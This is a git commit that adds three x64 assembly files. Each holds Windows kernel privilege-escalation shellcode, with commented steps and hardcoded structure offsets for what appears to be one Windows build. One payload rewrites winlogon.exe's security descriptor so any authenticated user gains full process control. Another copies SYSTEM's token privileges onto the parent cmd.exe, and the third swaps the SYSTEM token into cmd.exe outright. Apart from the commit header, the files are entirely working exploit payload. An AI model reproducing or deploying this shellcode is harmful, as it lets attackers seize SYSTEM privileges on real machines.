Add files via upload

This commit is contained in:
Ö
2025-04-06 15:34:44 +02:00
committed by GitHub
parent a35100c806
commit be242540ba
3 changed files with 98 additions and 0 deletions
+28
View File
@@ -0,0 +1,28 @@
BITS 64
section .text
nop
mov r8, qword [gs:0x188] ; Get _KTHREAD Address into r8
mov r8, qword [r8 + 0x220] ; Get _EPROCESS Address
mov rcx, r8 ; save Exploit process' _EPROCESS structure on rcx
loop1:
mov r8, qword [r8 + 0x448] ; move the flink into r8
sub r8, 0x448 ; go back to the start of the struct
cmp dword [r8+0x5a8], 0x6C6E6977 ; compare if it is equal to the first 4 characters "winl" (little endiand so "lniw")
jnz loop1
sub r8, 0x30 ; get the _OBJECT_HEADER of winlogon.exe
mov r8, [r8 + 0x28] ; move to the SecurityDescriptor parameter
and r8, 0xfffffffffffffff0 ; get the pointer to the object instead the fast reference pointer
mov byte [r8+0x20+0x28], 0x0b ; _SECURITY_DESCRIPTOR + 0x20 (DACL start) + 0x28 (byte we want to change); 0x12 (SYSTEM) -> 0x0b (Authenticated Users; sid S-1-5-18 (SYSTEM) Full Process Control -> S-1-5-11 Full Process Control (Authenticated Users)
mov rcx, [rcx+0x4b8] ; get the exploit process' _TOKEN structure
and rcx, 0xfffffffffffffff0 ; get the pointer to the object and not the fast reference
mov byte [rcx + 0x0d4], 0x0 ; set MandatoryPolicy to 0 (open handle to any process besides the privilege)
nop
ret
end
@@ -0,0 +1,38 @@
BITS 64
section .text
nop
mov r8, qword [gs:0x188]
mov r8, qword [r8 + 0x220]
mov r10, r8 ; get two _EPROCESS' start addresses (one for cmd and the other for system)
mov r9, qword [r8 + 0x540] ; get the cmd.exe PID (InheritedFromUniqueProcessId)
GetSystemLoop:
mov r10, qword [r10 + 0x448] ; go to the flink
sub r10, 0x448 ; go to the _EPROCESS' startpoint
cmp qword [r10 + 0x440], 0x04 ; compare the UniqueProcessId with 4 (system PID)
jne GetSystemLoop
mov r10, [r10 + 0x4b8] ; get the system process _TOKEN structure
and r10, 0xfffffffffffffff0 ; get the pointer to the object and not to the fast reference pointer
GetCmdLoop:
mov r8, qword [r8+0x448] ; go to the flink
sub r8, 0x448 ; go to the _EPROCESS' startpoint
cmp qword [r8 + 0x440], r9 ; compare the UniqueProcessId cmd.exe's PID
jne GetCmdLoop
mov r8, [r8 + 0x4b8] ; get the system process _TOKEN structure
and r8, 0xfffffffffffffff0 ; get the pointer to the object and not to the fast reference pointer
mov r9, qword [r10 + 0x40] ; move the Present parameter from _SEP_TOKEN_PRIVILEGES system process substructure to the same at cmd.exe
mov qword [r8 + 0x40], r9
mov r9, qword [r10 + 0x48] ; move the Enabled parameter from _SEP_TOKEN_PRIVILEGES system process substructure to the same at cmd.exe
mov qword [r8 + 0x48], r9
mov r9, qword [r10 + 0x50] ; move the EnabledByDefault parameter from _SEP_TOKEN_PRIVILEGES system process substructure to the same at cmd.exe
mov qword [r8 + 0x50], r9
ret
end
+32
View File
@@ -0,0 +1,32 @@
section .text
BITS 64
nop
mov r9, qword [gs:0x188] ; get _KTHREAD
mov r9, qword [r9 + 0x220] ; get _EPROCESS/_KPROCESS
mov r8, qword [r9 + 0x540] ; get the InheritedFromUniqueProcessId (cmd.exe PID)
loop1:
mov r9, qword [r9+0x448] ; go to the flink
sub r9, 0x448 ; back to the start of _EPROCESS
mov r10, qword [r9+0x440] ; get the UniqueProcessId
cmp r10, r8 ; compare both PIDs
jne loop1
mov rax, r9 ; get the cmd.exe's token
add rax, 0x4b8 ; get the address of _EPROCESS on Token position
loop2:
mov r9, qword [r9+0x448] ; go to the flink
sub r9, 0x448 ; go to the _EPROCESS' structure start
mov r10, qword [r9+0x440] ; Get the UniqueProcesId
cmp r10, 4 ; compare the process ID with 4
jne loop2
mov r9, qword [r9+0x4b8]
mov [rax], r9
ret
end